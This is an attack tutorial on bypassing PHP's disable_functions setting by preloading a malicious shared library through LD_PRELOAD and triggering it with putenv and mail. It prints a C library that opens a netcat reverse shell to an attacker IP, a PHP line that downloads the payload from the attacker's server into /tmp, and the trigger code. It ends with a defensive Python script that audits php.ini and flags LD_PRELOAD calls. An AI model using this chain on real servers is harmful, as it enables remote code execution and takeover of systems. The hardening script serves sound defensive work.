What is disable_functions?
disable_functions is a PHP security setting used to prevent specific functions from being executed on the system. Some functions that are commonly disabled are exec, passthru, shell_exec, proc_open, curl_exec, system, and fread.
LD_PRELOAD is an environment variable that makes the dynamic linker load the file it points to before any other library. For this to work, it must point to a .so file, which is a dynamically linked C library. So we will write a malicious library that relies on LD_PRELOAD, compile it into a .so, and finally upload it to the server.
Attack
Code
In the following code we have two functions, shell and getuid. The first one can contain any payload: this is the malicious code that will be executed in order to give us further access to the machine. The second function overrides the original getuid, and uses getenv to read the value of the environment variable LD_PRELOAD.

```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Payload: anything placed here runs inside the process that loaded the library. */
void shell() {
    system("nc -e /bin/sh 10.10.11.11 1234");
}

/* Overrides the libc getuid() (same signature) so the payload fires on the first call. */
uid_t getuid(void) {
    /* Only act when we were actually loaded through LD_PRELOAD. */
    if (getenv("LD_PRELOAD") == NULL) { return 0; }
    /* Remove LD_PRELOAD so child processes do not re-trigger the payload. */
    unsetenv("LD_PRELOAD");
    shell();
    return 0;
}
```
File Upload
There are hundreds of different ways to get a file onto a target system, but in this case I'll explain the method using file_get_contents. Using this method we can write our file into a directory. Usually /tmp is used for this, because of its permissions.
So all we have to do is run a Python HTTP server on our machine, and use the following code in the browser, in order to fetch the contents of our malicious library and write them into a file.

```php
fwrite(fopen("/tmp/exp.so", 'w'), file_get_contents("http://10.10.11.11:81/payload.so"));
```
RCE
Once the file is uploaded we have two different ways of firing up the shell. One is by uploading a PHP file, and the other one is by interacting with it directly through the browser. In both cases we make use of the PHP putenv and mail functions.
Putenv
Assigns a variable to the server environment. This environment variable only exists for the duration of the request. In this case it is used to point LD_PRELOAD at our payload file, so that our library is loaded and runs despite the disabled functions.
Usage:

```php
putenv(string $assignment): bool
```
Mail
The mail function is used to send emails. It receives five parameters: To, Subject, Message, Headers (optional), and Parameters (optional). In this case we rely on it spawning the sendmail daemon, a new process that inherits LD_PRELOAD, in order to get our library loaded.
Usage:

```php
mail(
    string $to,
    string $subject,
    string $message,
    string $additional_headers = "",
    string $additional_parameters = ""
): bool
```
PHP File
This file makes use of
```php
<?php putenv("LD_PRELOAD=./payload.so"); mail('soda','soda','soda','soda','soda'); ?>
```
In browser
```php
putenv("LD_PRELOAD=/tmp/payload.so").mail("soda","soda","soda","soda","soda")
```
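As an added hardening check that is not part of the original post, the following Python script audits a php.ini fragment to flag whether the two functions this technique depends on, putenv and mail, are still callable next to disable_functions, and scans PHP source for putenv() calls that set LD_PRELOAD. The ini fragments and the sample PHP are constructed for the example.

```python
import re

# Functions the bypass above needs: putenv() to set LD_PRELOAD and mail()
# to spawn the sendmail process that inherits it. (Constructed check list.)
BYPASS_FUNCTIONS = ("putenv", "mail")


def parse_disable_functions(ini_text: str) -> set[str]:
    """Return the lower-cased function names listed in disable_functions."""
    disabled = set()
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()  # drop ini comments
        m = re.match(r"disable_functions\s*=\s*(.*)$", line)
        if m:
            names = m.group(1).strip().strip('"').split(",")
            disabled.update(n.strip().lower() for n in names if n.strip())
    return disabled


def audit_ini(ini_text: str) -> list[str]:
    """Return the bypass-enabling functions that remain callable."""
    disabled = parse_disable_functions(ini_text)
    return [f for f in BYPASS_FUNCTIONS if f not in disabled]


# Matches putenv("LD_PRELOAD=...") or putenv('LD_PRELOAD=...') in PHP source.
LD_PRELOAD_RE = re.compile(r"putenv\s*\(\s*['\"]LD_PRELOAD=", re.IGNORECASE)


def find_ld_preload_bypass(php_source: str) -> list[int]:
    """Return 1-based line numbers where PHP source sets LD_PRELOAD via putenv()."""
    return [i for i, line in enumerate(php_source.splitlines(), 1)
            if LD_PRELOAD_RE.search(line)]


# Constructed php.ini fragments: the post's list, and the same list hardened.
WEAK_INI = 'disable_functions = exec,passthru,shell_exec,proc_open,curl_exec,system,fread\n'
HARDENED_INI = ('disable_functions = exec,passthru,shell_exec,proc_open,'
                'curl_exec,system,fread,putenv,mail\n')
# Constructed PHP file resembling the dropper shown above.
SAMPLE_PHP = '<?php\n$x = 1;\nputenv("LD_PRELOAD=/tmp/payload.so"); mail("a","b","c");\n'

if __name__ == "__main__":
    print("still callable (weak):", audit_ini(WEAK_INI))
    print("still callable (hardened):", audit_ini(HARDENED_INI))
    print("LD_PRELOAD lines:", find_ld_preload_bypass(SAMPLE_PHP))
```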
Resources
Upload using file_get_contents